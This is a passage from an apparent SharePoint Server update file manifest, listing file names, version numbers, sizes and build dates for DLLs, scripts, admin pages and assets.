microsoft.sharepoint.powershell.intl.dll| 16.0.10367.20000| 97208| 15-Sep-20| 12:07 \npsconfig.exe| psconfig.exe| 16.0.10367.20000| 538576| 15-Sep-20| 12:05 \npsconfigui.exe| psconfigui.exe| 16.0.10367.20000| 809936| 15-Sep-20| 12:05 \ncore_0.rsx| core.resx| | 526140| 15-Sep-20| 12:02 \ncloudweb.cfg| cloudweb.config| | 78613| 24-Aug-20| 11:15 \nstsom.dll| microsoft.sharepoint.dll| 16.0.10367.20000| 38513056| 15-Sep-20| 12:04 \nstsom.dll_0001| microsoft.sharepoint.dll| 16.0.10367.20000| 38513056| 15-Sep-20| 12:04 \nstsomdr.dll| microsoft.sharepoint.intl.dll| 16.0.10367.20000| 1409464| 15-Sep-20| 12:04 \nweb.cfg| web.config| | 78613| 24-Aug-20| 11:15 \nstsap.dll| microsoft.sharepoint.applicationpages.dll| 16.0.10367.20000| 2445792| 15-Sep-20| 12:02 \nstssoap.dll| stssoap.dll| 16.0.10367.20000| 775608| 15-Sep-20| 12:02 \nsubsetproxy.dll_0001| microsoft.sharepoint.subsetproxy.dll| 16.0.10367.20000| 1140704| 15-Sep-20| 12:01 \nsubsetshim.dll_0001| microsoft.sharepoint.dll| 16.900.rup.rpr| 2449320| 15-Sep-20| 12:05 \nsystem.net.http.formatting.5.2.3.dll| system.net.http.formatting.dll| 5.2.30128.0| 185544| | \nupdate_system.net.http.formatting.5.2.3.dll| system.net.http.formatting.dll| 5.2.30128.0| 185544| 24-Aug-20| 11:06 \nsystem.web.http.5.2.3.dll| system.web.http.dll| 5.2.30128.0| 471240| | \nupdate_system.web.http.5.2.3.dll| system.web.http.dll| 5.2.30128.0| 471240| 24-Aug-20| 11:07 \napplications.asx_0014| applications.aspx| | 3998| 24-Aug-20| 11:15 \napps.asx_0014| apps.aspx| | 3974| 24-Aug-20| 11:15 \nbackups.asx_0014| backups.aspx| | 3983| 24-Aug-20| 11:15 \nconfigurationwizards.asx_0014| configurationwizards.aspx| | 4022| 24-Aug-20| 11:15 \ndefault.asx_0014| default.aspx| | 5440| 24-Aug-20| 11:16 \ngenappsettings.asx_0014| generalapplicationsettings.aspx| | 4041| 24-Aug-20| 11:15 \nmonitoring.asx_0014| monitoring.aspx| | 3992| 24-Aug-20| 11:15 \no365config.asx_0015| office365configuration.aspx| | 5180| 24-Aug-20| 11:15 \nsecurity.asx_0014| security.aspx| | 3986| 24-Aug-20| 11:15 \nsysset.asx_0014| systemsettings.aspx| | 4004| 24-Aug-20| 11:15 \nupgandmig.asx_0014| upgradeandmigration.aspx| | 4019| 24-Aug-20| 11:15 \ndepl.xsd.x64| deploymentmanifest.xsd| | 91463| 2-Sep-20| 07:13 \ndip.js| dip.js| | 50487| 24-Aug-20| 11:20 \ndip.js_14| dip.js| | 50487| 24-Aug-20| 11:20 \nfldtypes.xsl| fldtypes.xsl| | 134868| 24-Aug-20| 11:18 \ninternal.xsl| internal.xsl| | 11270| 24-Aug-20| 11:18 \naccreqctl.debug.js| accessrequestscontrol.debug.js| | 20696| 15-Sep-20| 12:04 \naccreqctl.js| accessrequestscontrol.js| | 11682| 15-Sep-20| 12:04 \naccreqviewtmpl.debug.js| accessrequestsviewtemplate.debug.js| | 50013| 15-Sep-20| 12:04 \naccreqviewtmpl.js| accessrequestsviewtemplate.js| | 22931| 15-Sep-20| 12:04 \nappcatalogfieldtemplate.debug.js| appcatalogfieldtemplate.debug.js| | 9638| 15-Sep-20| 12:04 \nappcatalogfieldtemplate.js| appcatalogfieldtemplate.js| | 3693| 15-Sep-20| 12:04 \nappdeveloperdash.debug.js| appdeveloperdash.debug.js| | 23162| 15-Sep-20| 12:04 \nappdeveloperdash.js| appdeveloperdash.js| | 11550| 15-Sep-20| 12:04 \napprequestmanagefieldtemplate.debug.js| apprequestmanagefieldtemplate.debug.js| | 2771| 15-Sep-20| 12:04 \napprequestmanagefieldtemplate.js| apprequestmanagefieldtemplate.js| | 1474| 15-Sep-20| 12:04 \nautofill.debug.js| autofill.debug.js| | 20542| 15-Sep-20| 12:04 \nautofill.js| autofill.js| | 11560| 15-Sep-20| 12:04 \nautohostedlicensingtemplates.debug.js| autohostedlicensingtemplates.debug.js| | 21187| 15-Sep-20| 12:04 \nautohostedlicensingtemplates.js| autohostedlicensingtemplates.js| | 8987| 15-Sep-20| 12:04 \nbform.debug.js| bform.debug.js| | 460795| 15-Sep-20| 12:04 \nbform.js| bform.js| | 259447| 15-Sep-20| 12:05 \nblank.debug.js| blank.debug.js| | 755| 15-Sep-20| 12:04 \nblank.js| blank.js| | 454| 15-Sep-20| 12:04 \ncallout.debug.js| callout.debug.js| | 92058| 15-Sep-20| 12:04 \ncallout.js| callout.js| | 29840| 15-Sep-20| 12:04 \nchoicebuttonfieldtemplate.debug.js| choicebuttonfieldtemplate.debug.js| | 6382| 15-Sep-20| 12:04 \nchoicebuttonfieldtemplate.js| choicebuttonfieldtemplate.js| | 2741| 15-Sep-20| 12:04 \nclientforms.debug.js| clientforms.debug.js| | 156151| 15-Sep-20| 12:04 \nclientforms.js| clientforms.js| | 79346| 15-Sep-20| 12:04 \nclientpeoplepicker.debug.js| clientpeoplepicker.debug.js| | 83429| 15-Sep-20| 12:04 \nclientpeoplepicker.js| clientpeoplepicker.js| | 44308| 15-Sep-20| 12:04 \nclientrenderer.debug.js| clientrenderer.debug.js| | 30681| 15-Sep-20| 12:04 \nclientrenderer.js| clientrenderer.js| | 12958| 15-Sep-20| 12:04 \nclienttemplates.debug.js| clienttemplates.debug.js| | 398440| 15-Sep-20| 12:04 \nclienttemplates.js| clienttemplates.js| | 203534| 15-Sep-20| 12:04 \ncommonvalidation.debug.js| commonvalidation.debug.js| | 6758| 15-Sep-20| 12:04 \ncomval.js| commonvalidation.js| | 4222| 15-Sep-20| 12:04 \ncore.debug.js| core.debug.js| | 956321| 15-Sep-20| 12:04 \ncore.js_0001| core.js| | 507436| 15-Sep-20| 12:04 \ncreatesharedfolderdialog.debug.js| createsharedfolderdialog.debug.js| | 43148| 15-Sep-20| 12:04 \ncreatesharedfolderdialog.js| createsharedfolderdialog.js| | 18920| 15-Sep-20| 12:04 \ndatepicker.debug.js| datepicker.debug.js| | 160480| 15-Sep-20| 12:04 \ndatepick.js| datepicker.js| | 71515| 15-Sep-20| 12:04 \ndesigngallery.debug.js| designgallery.debug.js| | 47390| 15-Sep-20| 12:04 \ndesigngallery.js| designgallery.js| | 29173| 15-Sep-20| 12:04 \ndevdash.debug.js| devdash.debug.js| | 89841| 15-Sep-20| 12:04 \ndevdash.js| devdash.js| | 38402| 15-Sep-20| 12:04 \ndragdrop.debug.js| dragdrop.debug.js| | 237903| 15-Sep-20| 12:04 \ndragdrop.js| dragdrop.js| | 122563| 15-Sep-20| 12:04 \nentityeditor.debug.js| entityeditor.debug.js| | 73995| 15-Sep-20| 12:04 \nentityeditor.js| entityeditor.js| | 38997| 15-Sep-20| 12:04 \nfilepreview.debug.js| filepreview.debug.js| | 25986| 15-Sep-20| 12:04 \nfilepreview.js| filepreview.js| | 14044| 15-Sep-20| 12:04 \nfoldhyperlink.debug.js| foldhyperlink.debug.js| | 3924| 15-Sep-20| 12:04 \nfoldhyperlink.js| foldhyperlink.js| | 1861| 15-Sep-20| 12:04 \nform.debug.js| form.debug.js| | 241306| 15-Sep-20| 12:04 \nform.js| form.js| | 129250| 15-Sep-20| 12:04 \nganttscript.debug.js| ganttscript.debug.js| | 9384| 15-Sep-20| 12:04 \nganttscr.js| ganttscript.js| | 5098| 15-Sep-20| 12:04 \ngeolocationfieldtemplate.debug.js| geolocationfieldtemplate.debug.js| | 41051| 15-Sep-20| 12:04 \ngeolocationfieldtemplate.js| geolocationfieldtemplate.js| | 15434| 15-Sep-20| 12:04 \ngroupboard.debug.js| groupboard.debug.js| | 16339| 15-Sep-20| 12:04 \ngroupboard.js| groupboard.js| | 9548| 15-Sep-20| 12:04 \ngroupeditempicker.debug.js| groupeditempicker.debug.js| | 21014| 15-Sep-20| 12:04 \ngip.js| groupeditempicker.js| | 12055| 15-Sep-20| 12:04 \nhierarchytaskslist.debug.js| hierarchytaskslist.debug.js| | 60796| 15-Sep-20| 12:04 \nhierarchytaskslist.js| hierarchytaskslist.js| | 20086| 15-Sep-20| 12:04 \nimglib.debug.js| imglib.debug.js| | 91322| 15-Sep-20| 12:04 \nimglib.js| imglib.js| | 53905| 15-Sep-20| 12:04 \ninit.debug.js| init.debug.js| | 626758| 15-Sep-20| 11:59 \ninit.js_0001| init.js| | 303154| 15-Sep-20| 12:04 \ninplview.debug.js| inplview.debug.js| | 156138| 15-Sep-20| 12:04 \ninplview.js| inplview.js| | 79676| 15-Sep-20| 12:04 \njsgrid.debug.js| jsgrid.debug.js| | 1186754| 15-Sep-20| 12:04 \njsgrid.gantt.debug.js| jsgrid.gantt.debug.js| | 110109| 15-Sep-20| 12:04 \njsgrid.gantt.js| jsgrid.gantt.js| | 42304| 15-Sep-20| 12:04 \njsgrid.js| jsgrid.js| | 445146| 15-Sep-20| 12:04 \nlanguagepickercontrol.js| languagepickercontrol.js| | 11516| 15-Sep-20| 12:04 \nlistview.debug.js| listview.debug.js| | 932786| 15-Sep-20| 12:04 \nlistview.js| listview.js| | 400941| 15-Sep-20| 12:04 \nmapviewtemplate.debug.js| mapviewtemplate.debug.js| | 38394| 15-Sep-20| 12:04 \nmapviewtemplate.js| mapviewtemplate.js| | 15542| 15-Sep-20| 12:04 \nmenu.debug.js| menu.debug.js| | 103516| 15-Sep-20| 12:04 \nmenu.js_0001| menu.js| | 52559| 15-Sep-20| 12:04 \nsuitenav.js| suitenav.js| | 205345| 24-Aug-20| 11:21 \nsuitenavstandalone.js| suitenavstandalone.js| | 244286| 24-Aug-20| 11:21 \nmountpt.debug.js| mountpoint.debug.js| | 13632| 15-Sep-20| 12:04 \nmountpt.js| mountpoint.js| | 6211| 15-Sep-20| 12:04 \nmquery.debug.js| mquery.debug.js| | 60340| 15-Sep-20| 12:04 \nmquery.js| mquery.js| | 22614| 15-Sep-20| 12:04 \nms.rte.debug.js| ms.rte.debug.js| | 714864| 15-Sep-20| 12:04 \nms.rte.js| ms.rte.js| | 401417| 15-Sep-20| 12:04 \noffline.debug.js| offline.debug.js| | 22154| 15-Sep-20| 12:04 \noffline.js| offline.js| | 11383| 15-Sep-20| 12:04 \nows.debug.js| ows.debug.js| | 714694| 15-Sep-20| 12:04 \nows.js| ows.js| | 377270| 15-Sep-20| 12:04 \nowsbrows.debug.js| owsbrows.debug.js| | 24954| 15-Sep-20| 12:04 \nowsbrows.js| owsbrows.js| | 13300| 15-Sep-20| 12:04 \npickerhierarchycontrol.js| pickerhierarchycontrol.js| | 84676| 15-Sep-20| 12:04 \npivotcontrol.debug.js| pivotcontrol.debug.js| | 18165| 24-Aug-20| 11:17 \npivotcontrol.js| pivotcontrol.js| | 8592| 24-Aug-20| 11:18 \nquicklaunch.debug.js| quicklaunch.debug.js| | 135522| 15-Sep-20| 12:04 \nquicklaunch.js| quicklaunch.js| | 74048| 15-Sep-20| 12:04 \nradiobuttonwithchildren.js| radiobuttonwithchildren.js| | 3555| 15-Sep-20| 12:04 \nroamingapps.debug.js| roamingapps.debug.js| | 55031| 15-Sep-20| 12:04 \nroamingapps.js| roamingapps.js| | 21853| 15-Sep-20| 12:04 \nsharing.debug.js| sharing.debug.js| | 322361| 15-Sep-20| 12:04 \nsharing.js| sharing.js| | 135348| 15-Sep-20| 12:04 \nsharingmodern.debug.js| sharingmodern.debug.js| | 18196| 15-Sep-20| 12:04 \nsharingmodern.js| sharingmodern.js| | 5805| 15-Sep-20| 12:04 \nsinglesignon.debug.js| singlesignon.debug.js| | 17059| 15-Sep-20| 12:04 \nsinglesignon.js| singlesignon.js| | 6060| 15-Sep-20| 12:04 \nsiteupgrade.debug.js| siteupgrade.debug.js| | 1693| 15-Sep-20| 12:04 \nsiteupgrade.debug.js_14| siteupgrade.debug.js| | 1693| 15-Sep-20| 12:04 \nsiteupgrade.js| siteupgrade.js| | 1119| 15-Sep-20| 12:04 \nsiteupgrade.js_14| siteupgrade.js| | 1119| 15-Sep-20| 12:04 \nsp.accessibility.debug.js| sp.accessibility.debug.js| | 34811| 15-Sep-20| 12:04 \nsp.accessibility.js| sp.accessibility.js| | 21841| 15-Sep-20| 12:04 \nsp.core.debug.js| sp.core.debug.js| | 166073| 15-Sep-20| 11:59 \nsp.core.js| sp.core.js| | 87928| 15-Sep-20| 12:04 \nsp.datetimeutil.debug.js| sp.datetimeutil.debug.js| | 115552| 15-Sep-20| 12:04 \nsp.datetimeutil.js| sp.datetimeutil.js| | 66618| 15-Sep-20| 12:04 \nsp.debug.js| sp.debug.js| | 1702947| 15-Sep-20| 12:04 \nsp.exp.debug.js| sp.exp.debug.js| | 41182| 15-Sep-20| 12:04 \nsp.exp.js| sp.exp.js| | 24498| 15-Sep-20| 12:04 \nsp.init.debug.js| sp.init.debug.js| | 57831| 15-Sep-20| 12:04 \nsp.init.js| sp.init.js| | 32952| 15-Sep-20| 12:04 \nsp.js| sp.js| | 1042849| 15-Sep-20| 12:04 \nspmap.debug.js| sp.map.debug.js| | 15759| 15-Sep-20| 12:04 \nspmap.js| sp.map.js| | 8531| 15-Sep-20| 12:04 \nsppageinstr.debug.js| sp.pageinstrumentation.debug.js| | 1925| 15-Sep-20| 12:04 \nsppageinstr.js| sp.pageinstrumentation.js| | 1395| 15-Sep-20| 12:04 \nsp.requestexecutor.debug.js| sp.requestexecutor.debug.js| | 100405| 15-Sep-20| 12:04 \nsp.requestexecutor.js| sp.requestexecutor.js| | 63696| 15-Sep-20| 12:04 \nsp.ribbon.debug.js| sp.ribbon.debug.js| | 361474| 15-Sep-20| 12:04 \nsp.ribbon.js| sp.ribbon.js| | 222917| 15-Sep-20| 12:04 \nsp.runtime.debug.js| sp.runtime.debug.js| | 197022| 15-Sep-20| 11:59 \nsp.runtime.js| sp.runtime.js| | 115684| 15-Sep-20| 12:04 \nsp.simpleloggermobile.debug.js| sp.simpleloggermobile.debug.js| | 40931| 15-Sep-20| 12:04 \nsp.simpleloggermobile.js| sp.simpleloggermobile.js| | 20442| 15-Sep-20| 12:04 \nsp.storefront.debug.js| sp.storefront.debug.js| | 440500| 15-Sep-20| 12:04 \nsp.storefront.js| sp.storefront.js| | 296736| 15-Sep-20| 12:04 \nsp.ui.admin.debug.js| sp.ui.admin.debug.js| | 18904| 15-Sep-20| 12:04 \nsp.ui.admin.js| sp.ui.admin.js| | 11611| 15-Sep-20| 12:04 \nsp.ui.allapps.debug.js| sp.ui.allapps.debug.js| | 45304| 15-Sep-20| 12:04 \nsp.ui.allapps.js| sp.ui.allapps.js| | 27972| 15-Sep-20| 12:04 \nsp.ui.applicationpages.calendar.debug.js| sp.ui.applicationpages.calendar.debug.js| | 278413| 15-Sep-20| 12:04 \nsp.ui.applicationpages.calendar.js| sp.ui.applicationpages.calendar.js| | 143448| 15-Sep-20| 12:04 \nsp.ui.applicationpages.debug.js| sp.ui.applicationpages.debug.js| | 11283| 15-Sep-20| 12:04 \nsp.ui.applicationpages.js| sp.ui.applicationpages.js| | 7682| 15-Sep-20| 12:04 \nsp.ui.bdcadminpages.debug.js| sp.ui.bdcadminpages.debug.js| | 16634| 15-Sep-20| 12:04 \nsp.ui.bdcadminpages.js| sp.ui.bdcadminpages.js| | 11650| 15-Sep-20| 12:04 \nspblogd.js| sp.ui.blogs.debug.js| | 51882| 15-Sep-20| 12:04 \nspblog.js| sp.ui.blogs.js| | 31202| 15-Sep-20| 12:04 \nsp.ui.combobox.debug.js| sp.ui.combobox.debug.js| | 100153| 15-Sep-20| 12:04 \nsp.ui.combobox.js| sp.ui.combobox.js| | 52056| 15-Sep-20| 12:04 \nsp.ui.controls.debug.js| sp.ui.controls.debug.js| | 58556| 15-Sep-20| 12:04 \nsp.ui.controls.js| sp.ui.controls.js| | 39727| 15-Sep-20| 12:04 \nsp.ui.dialog.debug.js| sp.ui.dialog.debug.js| | 75579| 15-Sep-20| 12:04 \nsp.ui.dialog.js| sp.ui.dialog.js| | 44112| 15-Sep-20| 12:04 \nspdiscd.js| sp.ui.discussions.debug.js| | 136965| 15-Sep-20| 12:04 \nspdisc.js| sp.ui.discussions.js| | 81948| 15-Sep-20| 12:04 \nspimgcd.js| sp.ui.imagecrop.debug.js| | 28399| 15-Sep-20| 12:04 \nspimgc.js| sp.ui.imagecrop.js| | 28399| 15-Sep-20| 12:04 \nspui_rid.js| sp.ui.relateditems.debug.js| | 29224| 15-Sep-20| 12:04 \nspui_ri.js| sp.ui.relateditems.js| | 18376| 15-Sep-20| 12:04 \nsp.ui.rte.debug.js| sp.ui.rte.debug.js| | 355959| 15-Sep-20| 12:04 \nsp.ui.rte.js| sp.ui.rte.js| | 217944| 15-Sep-20| 12:04 \nsp.ui.tileview.debug.js| sp.ui.tileview.debug.js| | 100921| 15-Sep-20| 12:04 \nsp.ui.tileview.js| sp.ui.tileview.js| | 61800| 15-Sep-20| 12:04 \nspui_tld.js| sp.ui.timeline.debug.js| | 488762| 15-Sep-20| 12:04 \nspui_tl.js| sp.ui.timeline.js| | 265916| 15-Sep-20| 12:04 \nspgantt.debug.js| spgantt.debug.js| | 192623| 15-Sep-20| 12:04 \nspgantt.js| spgantt.js| | 69725| 15-Sep-20| 12:04 \nspgridview.debug.js| spgridview.debug.js| | 7876| 15-Sep-20| 12:04 \nspgridvw.js| spgridview.js| | 4901| 15-Sep-20| 12:04 \nstart.debug.js| start.debug.js| | 185210| 15-Sep-20| 12:04 \nstart.js| start.js| | 101322| 15-Sep-20| 12:04 \nsuitelinks.debug.js| suitelinks.debug.js| | 32319| 15-Sep-20| 12:04 \nsuitelnk.js| suitelinks.js| | 13506| 15-Sep-20| 12:04 \ntimecard.debug.js| timecard.debug.js| | 37455| 15-Sep-20| 12:04 \ntimecard.js| timecard.js| | 21190| 15-Sep-20| 12:04 \ntouchapp.js| touchapp.js| | 498041| 24-Aug-20| 11:18 \nwpadder.debug.js| wpadder.debug.js| | 52865| 15-Sep-20| 12:04 \nwpadder.js| wpadder.js| | 33268| 15-Sep-20| 12:04 \nwpcm.debug.js| wpcm.debug.js| | 7521| 15-Sep-20| 12:04 \nwpcm.js| wpcm.js| | 3847| 15-Sep-20| 12:04 \nmain.xsl| main.xsl| | 6078| 24-Aug-20| 11:18 \nsigstore.dll| sigstore.dll| | 19888| | \nupdate_sigstore.dll| sigstore.dll| | 19888| 24-Aug-20| 11:13 \nstore.sql| store.sql| | 8074807| 24-Aug-20| 11:13 \nstore.xml| store.xml| | 8917277| 15-Sep-20| 12:06 \nstoreazure.xml| store_azure.xml| | 8917277| 15-Sep-20| 12:06 \nusagedb.sql| usagedb.sql| | 88742| 24-Aug-20| 11:14 \nusgdbup.sql| usgdbup.sql| | 88551| 24-Aug-20| 11:14 \nappassoc.asx| applicationassociations.aspx| | 5504| 24-Aug-20| 11:22 \nauthen.asx| authentication.aspx| | 13965| 24-Aug-20| 11:22 \nblkftyp.asx| blockedfiletype.aspx| | 4282| 24-Aug-20| 11:22 \ndftcntdb.asx| defaultcontentdb.aspx| | 6243| 24-Aug-20| 11:22 \nhealrepo.asx| healthreport.aspx| | 6499| 24-Aug-20| 11:22 \nincemail.asx| incomingemail.aspx| | 22663| 24-Aug-20| 11:21 \nirmadmin.asx| irmadmin.aspx| | 8804| 24-Aug-20| 11:21 \nlogusage.asx| logusage.aspx| | 14555| 24-Aug-20| 11:22 \nmetrics.asx| metrics.aspx| | 15403| 24-Aug-20| 11:21 \nofadmin.asx| officialfileadmin.aspx| | 13839| 24-Aug-20| 11:21 \nprivacy.asx| privacy.aspx| | 10182| 24-Aug-20| 11:22 \nslctcfaz.asx| selectcrossfirewallaccesszone.aspx| | 5643| 24-Aug-20| 11:22 \nsvcappcn.asx| serviceapplicationconnect.aspx| | 5027| 24-Aug-20| 11:22 \nsiteex.asx| siteandlistexport.aspx| | 12538| 24-Aug-20| 11:21 \nsitebaks.asx| sitebackuporexportstatus.aspx| | 10389| 24-Aug-20| 11:22 \nsitecbac.asx| sitecollectionbackup.aspx| | 10764| 24-Aug-20| 11:22 \nsitequot.asx| sitequota.aspx| | 24455| 24-Aug-20| 11:22 \nspscrstg.asx_0002| spsecuritysettings.aspx| | 7731| 24-Aug-20| 11:22 \nunatcdb.asx| unattacheddbselect.aspx| | 6322| 24-Aug-20| 11:24 \nuser_solution.asx| usersolutions.aspx| | 9571| 24-Aug-20| 11:22 \nlightbox.asx| lightbox.aspx| | 10265| 24-Aug-20| 11:17 \nshare.asx| share.aspx| | 47815| 24-Aug-20| 11:17 \nversions.asx| versions.aspx| | 37378| 24-Aug-20| 11:17 \nofadmin.aspx_tenantadmin| ta_officialfileadmin.aspx| | 11593| 24-Aug-20| 11:22 \nvwstyles.xsl| vwstyles.xsl| | 131251| 24-Aug-20| 11:18 \nowstimer.exe_0001| owstimer.exe| 16.0.10367.20000| 80808| 15-Sep-20| 12:06 \nmicrosoft.extensions.dependencyinjection.abstractions.1.0.0.dll| microsoft.extensions.dependencyinjection.abstractions.dll| 1.0.0.20622| 35736| | \nupdate_microsoft.extensions.dependencyinjection.abstractions.1.0.0.dll| microsoft.extensions.dependencyinjection.abstractions.dll| 1.0.0.20622| 35736| 14-Sep-20| 08:35 \nmicrosoft.extensions.dependencyinjection.1.0.0.dll| microsoft.extensions.dependencyinjection.dll| 1.0.0.20622| 37264| | \nupdate_microsoft.extensions.dependencyinjection.1.0.0.dll| microsoft.extensions.dependencyinjection.dll| 1.0.0.20622| 37264| 15-Sep-20| 12:00 \nmicrosoft.odata.core.7.0.0.dll| microsoft.odata.core.dll| 7.0.0.0| 1395608| | \nupdate_microsoft.odata.core.7.0.0.dll| microsoft.odata.core.dll| 7.0.0.0| 1395608| 15-Sep-20| 12:00 \nmicrosoft.odata.edm.7.0.0.dll| microsoft.odata.edm.dll| 7.0.0.0| 780200| | \nupdate_microsoft.odata.edm.7.0.0.dll| microsoft.odata.edm.dll| 7.0.0.0| 780200| 14-Sep-20| 08:35 \nmicrosoft.spatial.7.0.0.dll| microsoft.spatial.dll| 7.0.0.0| 135584| | \nupdate_microsoft.spatial.7.0.0.dll| microsoft.spatial.dll| 7.0.0.0| 135584| 14-Sep-20| 08:35 \nmicrosoft.vroom.sharepoint.dll| microsoft.vroom.sharepoint.dll| 16.0.10367.20000| 623544| 15-Sep-20| 12:00 \nsystem.collections.immutable.1.2.0.dll| system.collections.immutable.dll| 1.0.24212.01| 174000| | \nupdate_system.collections.immutable.1.2.0.dll| system.collections.immutable.1.2.0.dll| 1.0.24212.01| 174000| 15-Sep-20| 11:59 \nsystem.web.http.owin.5.2.3.dll| system.web.http.owin.dll| 5.2.30128.0| 64416| | \nupdate_system.web.http.owin.5.2.3.dll| system.web.http.owin.dll| 5.2.30128.0| 64416| 15-Sep-20| 12:00 \nsystem.web.odata.6.0.0.dll| system.web.odata.dll| 6.0.40914.0| 779672| | \nupdate_system.web.odata.6.0.0.dll| system.web.odata.dll| 6.0.40914.0| 779672| 15-Sep-20| 12:00 \nspwriter.exe_0001| spwriter.exe| 16.0.10367.20000| 51128| 15-Sep-20| 12:04 \nstswel.dll| stswel.dll| 16.0.10367.20000| 3670448| 15-Sep-20| 12:02 \nstswfacb.dll| microsoft.sharepoint.workflowactions.dll| 16.0.10367.20000| 312768| 15-Sep-20| 11:59 \nstswfact.dll| microsoft.sharepoint.workflowactions.dll| 16.0.10367.20000| 312768| 15-Sep-20| 11:59 \nsts.workflows.dll| microsoft.sharepoint.workflows.dll| 16.0.10367.20000| 65464| 15-Sep-20| 12:06 \nie50up.debug.js| ie50up.debug.js| | 155104| 15-Sep-20| 12:04 \nie50up.js| ie50up.js| | 81713| 15-Sep-20| 12:04 \nie55up.debug.js| ie55up.debug.js| | 154298| 15-Sep-20| 12:04 \nie55up.js| ie55up.js| | 81174| 15-Sep-20| 12:04 \nnon_ie.debug.js| non_ie.debug.js| | 102961| 15-Sep-20| 12:04 \nnon_ie.js| non_ie.js| | 60386| 15-Sep-20| 12:04 \nbpstd.debug.js| bpstd.debug.js| | 8194| 15-Sep-20| 11:59 \nbpstd.js| bpstd.js| | 4666| 15-Sep-20| 11:59 \nctp.debug.js| ctp.debug.js| | 7940| 15-Sep-20| 11:59 \nctp.js| ctp.js| | 4221| 15-Sep-20| 11:59 \ncvtp.debug.js| cvtp.debug.js| | 5066| 15-Sep-20| 11:59 \ncvtp.js| cvtp.js| | 2702| 15-Sep-20| 11:59 \nitp.debug.js| itp.debug.js| | 13120| 15-Sep-20| 11:59 \nitp.js| itp.js| | 9812| 15-Sep-20| 11:59 \nxtp.debug.js| xtp.debug.js| | 3605| 15-Sep-20| 11:59 \nxtp.js| xtp.js| | 1799| 15-Sep-20| 11:59 \nconversion.office.msosvgwin32server.dll| msosvgwin32server.dll| 16.0.10367.20000| 1799608| 15-Sep-20| 12:04 \nppt.conversion.msosvgwin32server.dll| msosvgwin32server.dll| 16.0.10367.20000| 1799608| 15-Sep-20| 12:04 \nppt.edit.msosvgwin32server.dll| msosvgwin32server.dll| 16.0.10367.20000| 1799608| 15-Sep-20| 12:04 \nosrv_sandbox.dll| microsoft.office.server.sandbox.dll| 16.0.10367.20000| 761280| 15-Sep-20| 12:02 \nmicrosoft.office.web.sandbox.dll| microsoft.office.web.sandbox.dll| 16.0.10367.20000| 761280| 15-Sep-20| 12:02 \nsts_sandbox.dll| microsoft.sharepoint.sandbox.dll| 16.0.10367.20000| 761280| 15-Sep-20| 12:02 \nvisfilt.dll.x64| visfilt.dll| 16.0.10367.20000| 6133168| 15-Sep-20| 12:05 \nvsrvwfe.dll| microsoft.office.visio.server.dll| 16.0.10367.20000| 2023352| 15-Sep-20| 12:04 \nvsrvvgs.dll| microsoft.office.visio.server.graphicsserver.dll| 16.0.10367.20000| 1299384| 15-Sep-20| 12:04 \nvisioserver.vutils.dll| vutils.dll| 16.0.10367.20000| 3139480| 15-Sep-20| 12:05 \noffice365icons.eot| office365icons.eot| | 84528| | \noffice365icons_1.eot| office365icons.eot| | 84528| 10-Sep-20| 09:44 \nsts_odspnextnewux1f1ebb360d2bde34a50cf953c975391e| createsite.js| | 1070953| 14-Sep-20| 08:39 \nsts_odspnextnewux1efa61166de43c71668b949c99f0686b| listitemformdeferred.js| | 2259289| 14-Sep-20| 08:39 \nsts_odspnextnewuxcd202787c8a8cb28e2c71ee818995ab3| listitemformexecutors.js| | 618574| 10-Sep-20| 10:43 \nsts_odspnextnewuxe8f363779e230efb9d852eceace8ab24| listitemformreactcontrols.js| | 199820| 10-Sep-20| 10:43 \nsts_odspnextnewux71d8b89e6d9d95995887b0a27dbc8f99| listitemformscenario.js| | 882508| 10-Sep-20| 10:43 \nsts_odspnextnewuxbe3313501487c79fe05e26c262deaaa9| createsite.json| | 43509| 14-Sep-20| 08:39 \nsts_odspnextnewux73bf67ca708ed0b9bbee05da7d4ab95b| listitemform.json| | 178794| 14-Sep-20| 08:39 \nodbonedrive.json| odbonedrive.json| | 359372| 14-Sep-20| 08:39 \nsts_odspnextnewux0caa67c96a8a488d88a0b64e58cf6219| recyclebin.json| | 181228| 14-Sep-20| 08:39 \nsts_odspnextnewux82ec74261e20424f9653d60d8846afce| sitehub.json| | 223297| 14-Sep-20| 08:39 \nsts_odspnextnewuxc2feb86763199de55a499729d395cb83| splist.json| | 299175| 14-Sep-20| 08:39 \nsts_odspnextnewuxc4da3cf2e6b1ad11477e32ac2c90cea6| odbdeferred.js| | 2442343| 14-Sep-20| 08:39 \nsts_odspnextnewux308f9878bc3bd35d6e7c02477ff10b6f| odbdeferredcontrols.js| | 688882| 14-Sep-20| 08:39 \nsts_odspnextnewux9e5f0d05cada29614b74c28d9065e102| odbexecutors.js| | 962513| 14-Sep-20| 08:39 \nsts_odspnextnewuxc563bd732bac9201f0dcad0747118e6b| odbfiles.js| | 839436| 10-Sep-20| 10:44 \nsts_odspnextnewux8c0380eb9a20542616b7c1feeac0f995| odbonedrive.js| | 678698| 14-Sep-20| 08:39 \nsts_odspnextnewux6e3d88bd0f1447b264307d9749f011bc| odboneup.js| | 354486| 10-Sep-20| 10:44 \nsts_odspnextnewux4a79707daf48fcca13da03638a9e77b8| odbreactcontrols.js| | 591987| 14-Sep-20| 08:39 \nsts_odspnextnewux57f35b229017c79fd2db2964ca66fbca| odbsites.js| | 148451| 14-Sep-20| 08:39 \nsts_odspnextnewuxdf192495e18fd01667a80b7f5657d569| odbtiles.js| | 261581| 10-Sep-20| 10:44 \nsts_odspnextnewux1a2b15ed274bbfbba6d5eaa8be1efc60| odbuploadmanager.js| | 64689| 10-Sep-20| 10:44 \nsts_odspnextnewux795d12a100cd0691f928c64b88b80240| odrestore.js| | 368703| 10-Sep-20| 10:44 \nsts_odspnextnewuxb04c6bd9af89e0b8de15413f309e7ade| 112x80_blankdocument.png| | 206| 10-Sep-20| 10:44 \nsts_odspnextnewux54576faed46c6dfea9ae9eb039a20d20| 112x80_default_back.png| | 478| 10-Sep-20| 10:44 \nsts_odspnextnewux5283eb8f4cab57bb8fc15650a0d92f99| 112x80_default_front.png| | 774| 10-Sep-20| 10:44 \nsts_odspnextnewux6afbec05ecfc043a474f4964397533b7| 112x80_photo_front.png| | 580| 10-Sep-20| 10:44 \nsts_odspnextnewuxc213e014150d89455dba0fb815be612f| 112x80_photos_back.png| | 645| 10-Sep-20| 10:44 \nsts_odspnextnewuxf9ae978879649d30526534752882f692| 112x80_shadow.png| | 545| 10-Sep-20| 10:44 \nsts_odspnextnewux4c0d7498c1ef7a1534ccb3701897c981| 112x80_shadow_empty.png| | 529| 10-Sep-20| 10:44 \nsts_odspnextnewux9ffcc6e0423cb2cf4d2279bbba952eb4| 72x52_blankdocument.png| | 158| 